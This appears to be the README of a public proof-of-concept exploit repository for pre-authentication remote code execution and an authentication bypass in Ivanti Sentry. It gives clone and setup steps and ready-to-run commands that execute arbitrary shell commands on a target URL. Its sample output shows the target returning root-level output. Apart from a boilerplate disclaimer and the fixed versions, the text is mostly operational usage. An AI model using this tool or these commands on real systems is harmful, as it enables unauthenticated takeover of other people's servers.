
CVE-2026-10520
Pre-Authentication Remote Code Execution + Authentication Bypass
Author: Ashraf Zaryouh "0xBlackash"
Two critical vulnerabilities affecting Ivanti Sentry (formerly MobileIron Sentry):
These flaws allow unauthenticated attackers to achieve full system compromise.
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>
# Basic usage
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
# Verbose mode
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
# With proxy
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
# Check kernel
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py
When vulnerable, you will see:
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-10520 & CVE-2026-10523 PoC Exploit
Ivanti Sentry Pre-Auth RCE + Auth Bypass
Author: Ashraf Zaryouh "0xBlackash"
GitHub: https://github.com/0xBlackash
[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)
This tool is for educational and authorized security testing only.
Unauthorized use against systems you do not own is illegal.
The author takes no responsibility for misuse.
Fixed in: 10.5.2 / 10.6.2 / 10.7.1
Made with ❤️ by Ashraf Zaryouh "0xBlackash"
Star the repo if you found it useful! ⭐
| Argument | Description | Required |
|---|
--url | Target URL (e.g. https://target:8443) | Yes |
--cmd | Command to execute | Yes |
-v, --verbose | Enable verbose output | No |
--proxy | HTTP proxy (host:port) | No |